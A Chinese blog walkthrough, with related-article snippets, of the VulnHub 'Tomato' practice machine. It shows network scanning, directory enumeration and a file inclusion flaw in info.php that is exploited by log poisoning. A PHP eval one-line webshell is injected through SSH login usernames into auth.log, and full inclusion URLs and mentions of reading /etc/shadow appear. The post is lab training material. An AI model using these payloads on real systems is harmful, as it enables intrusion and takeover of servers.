tomato靶场通关详细攻略

最新推荐文章于 2025-07-21 21:11:09 发布

原创最新推荐文章于 2025-07-21 21:11:09 发布 · 225 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#linux #运维 #服务器 #tomato #靶场 #web安全

确保kali和虚拟机的网络适配器都为NAT

扫描网段

先确定kali的ip为192.168.159.146，

扫描同网段

nmap 192.168.159.146/24

发现还有一个149的ip，虚拟机的ip即为192.168.159.149

访问网站

在物理机访问虚拟机ip

扫描端口

寻找子域

在kali中使用dirb工具

dirb http://192.168.159.149

5.访问网站

访问扫出来的网站

依次点开查看内容

看到敏感信息info.php,点开查看

右键查看一下源代码

发现有个注释掉的get型漏洞

使用image参数发送指令，有回应，存在漏洞

尝试连接写入病毒

<?php eval($_POST[cmd]);?>

尝试登录后我们的木马会来到日志中，链接即可

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

与神明画鸭

关注关注

3
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

【打靶记录】VulnHub-Tomato靶机渗透wp

qq_39972370的博客

11-17

2974

Tomato靶机是一个用于渗透测试和漏洞研究的虚拟机。它是由Tomato Security公司开发的，基于Debian操作系统，并包含了多个常见的漏洞和安全工具，如Metasploit、Nmap、Burp Suite等。它模拟了一个真实的网络环境，用户可以在其中执行实际的攻击和渗透测试，以测试其安全性和发现潜在的漏洞。

【每日打靶练习】Vulnhub靶机平台-tomato

leo788的博客

12-30

1790

在网页的下边找到包含内容，通过返回信息中的用户属性得到信息：root用户可以执行shell，下方的tomato用户也可以执行shell，继续。尝试ssh连接，这里使用错误的用户名和错误的密码，输入三次后，写入日志中，检查一下log，成功获取到日志信息，可通过修改ruser来进行注入。刷新日志进行查看，发现注入未显示，证明注入成功，木马被作为代码执行，若显示则失败，代码木马作为文本执行。包含失败，这里未开放远程包含，同时本地包含文件无可再利用—》转换思路。执行后的匹配到相应漏洞，选择可能性高的来试一下。

参与评论您还未登录，请先登录后发表或查看评论

Tomato靶机复现过程

weixin_67729650的博客

08-04

2384

这里我们看到了有一个用户Tomato的uid为1000（我们linux主机创建的第一个用户的uid为1000）,且它的shell为/bin/bash（说明可以分配终端）,再结合我们前面扫到的2211远程连接端口，说明这个用户是可以被远程连接的,我们知道了用户名,知道了端口号,知道了ip地址，就差密码就可以远程连接这个靶机了,既然前面可以看/etc/passwd,我们也可以看一下/etc/shadow文件,这样密码也知道了,那不就拿下了?紧接着我们可以试试我们学过的文件包含的漏洞知识，去试试。

tomato靶场通关攻略

2401_85578339的博客

03-12

547

http://192.168.126.151/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.loghttp://192.168.126.151:2211/<?php @eval($_POST['cmd']);?>运用蚁剑连接木马，连接成功即可

靶场通关 | Tomato靶机通关秘籍~

鱼溯的博客

10-20

1985

靶场通关 | Tomato靶机通关秘籍~

Tomato靶场通关攻略

2301_80176211的博客

09-04

238

将一句话木马作为ssh登录的用户名，然后登陆，密码随便输入，这样日志文件就会记录该用户登录失败的日志，而该用户的用户名就是我们的一句话木马。的信息，允许远程读取URL文件，但是不允许包含URL文件，可以进行利用。查看源码发现，提示可以传参，存在文件包含漏洞。查看日志文件，日志文件记录了其他用户的一些操作，其中或许留有线索。详细扫描一下端口，发现2211端口是开放的。尝试过后，我们发现是113，利用kali。，接着访问该目录，发现存在很多文件。我们发现了一个地址，去访问一下。

Tomato 文件包含漏洞靶机通关攻略

qq_65379983的博客

03-12

1205

文件包含漏洞利用上传一句话木马蚁剑连接

vulnhub靶机渗透 Tomato

RestoreJustice的博客

03-19

667

下载后用 VMware 或者 VirtualBox 打开，并配置好网卡，靶机与攻击机应置于同一网络下，靶机默认是桥接模式，能用攻击机连接到就行。使用nmap扫描端口，并做服务识别和深度扫描（加-A参数）：nmap -p- -A 192.168.110.137。需要url编码后才能执行，且蚁剑上不能执行，以前类似的环境试过，就python可以。靶机开启了21端口FTP服务、80端口Apache服务、2211端口ssh服务和8888端口nginx服务。尝试登录，被记入日志。使用了第一个，失败了。

tomato靶场复现

m0_68471358的博客

08-03

588

在多次尝试后，发现/var/log/auth.log中记录了FTP和SSH的登录服务，我们使用root和root123123123123123账户尝试ssh登录，可以看到被写入到了auth.log日志文件中，如果我们换成一句话木马内容，并且写入到此日志文件中，就可以使用系统目前的文件包含漏洞加载此日志文件，加载一句话木马。include语句会获取指定文件中存在的所有文本/代码/标记，文件包含函数加载的参数没有经过过滤或者严格的定义，可以被用户控制，包含其他恶意文件，导致了执行了非预期的代码。

Tomato靶场复现

Zx244349115的博客

11-09

1852

希望你可以第二遍自己不看教程，刷一遍该靶场。

vulnhub靶场-tomato

qq_42947816的博客

03-07

8022

Vulnhub旨在提供环境，让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。

【打靶】Tomato靶场

qq_59119347的博客

11-05

1512

那么我们可以试试包含日志，如果日志中，存在有 php 代码也可以引入到文件包含中，如果日志有 php 恶意代码也可导致 getshell。在nmap扫描的时候已经知道是liunx操作系统，直接包含/etc/passwd发现有回显，看来就是有文件包含漏洞。‌：Apache的日志文件，记录HTTP请求信息。‌：MariaDB的日志文件，记录数据库操作信息。‌：MySQL的日志文件，记录数据库操作信息。‌：Nginx的日志文件，记录HTTP请求信息。‌：内核日志，记录内核启动和运行时的信息。

2401_84919661的博客

05-12

476

技术文档也是我自己整理的，包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点，电子书也有200多本，由于内容的敏感性，我就不一一展示了。网上虽然也有很多的学习资源，但基本上都残缺不全的，这是我自己录的网安视频教程，上面路线图的每一个知识点，我都有配套的视频讲解。攻击和防守要学的东西也不少，具体要学的东西我都写在了上面的路线图，如果你能学完它们，你去就业和接私活完全没有问题。（都打包成一块的了，不能一一展开，总共300多集）同样的在日志文件中确实发现了存在相关记录。1.6 反弹shell。

Tomato靶场通关教程

最新发布

fristchoice的博客

07-21

1643

本文记录了对192.168.80.131靶机的渗透测试过程。首先通过网段扫描发现目标IP，发现8888端口存在登录界面但无法突破。通过目录扫描发现/antibot_image/info.php存在文件包含漏洞，可读取/etc/passwd。尝试利用日志文件GetShell未果后，转用SSH暴力破解，最终成功通过auth.log文件写入木马并获取系统权限。整个过程展示了从信息收集到漏洞利用的完整渗透路径。

tomato靶场攻略

kknifek的博客

09-04

533

1.使用nmap扫描同网段的端口，发现靶机地址 2.访问到主页面，只能看到一个大西红柿 3.再来使用dirb扫面以下有那些目录，发现有一个antibot_image 4.访问我们扫到的地址，点金目录里看看有些什么文件 5.看到info.php很熟悉，点进去看看 6.查看源代码发现是通过GET方式传参的，有文件包含漏洞 7. 利用文件包含漏洞，我们尝试查看一下passwd文件内容，可以成功 8.再来看看日志文件发现记录了ssh登录的登录日志，利用这个机

靶场之tomato

ineedmoreMuQ的博客

07-29

260

到这里问题就简单了他是get的image参数那么我们加上参数include文件即可。之前扫端口看他2211开着，那就不客气了，ssh启动！用kali自带的dirb又炸出来一个目录，看一看。找完回来了，我只扫了目录没扫端口，回来扫个端口。还没扫完，不过有几个不常见的端口，我们看看。这次我们来做一做tomato这个靶场。一堆东西，随便翻一翻，头大，攻略X3。然后我们使用御剑来扫描端口访问页面。只扫到一个，打出GG，去找攻略了。启动失败，显示存在无效字符，GG。一看能回显，哇塞，金色传说。是个目录，点进去一看。

vulnhub靶场-tomato渗透测试

m0_62750315的博客

09-08

1737

小白学渗透

tomato靶场打靶过程

qq_64703089的博客

08-02

681

本次打靶利用的是文件包含漏洞包含日志GetShell，通过写入错误登录信息连接shell。

Tomato靶机通关教程

m0_75169999的博客

07-21

434

2.不过在此之前我们还得看看我们是否有ssh日志文件的权限，ubantu的ssh日志文件一般默认保存在/var/log/auth.log下。我们输入：file:///var/log/auth.log就可以看到成功读取到了他的日志文件。扫描到常用端口后我们还需要扫描一遍全端口避免遗漏，可以看到除了上面三个常用端口外还三个不常用的端口，110是pop3邮件传输，后面两个是自定意的。1.首先我们需要准备好我们的靶场文件然后直接将这个文件托入vmware虚拟机里面就可以了。就可以看到扫描出三个敏感目录。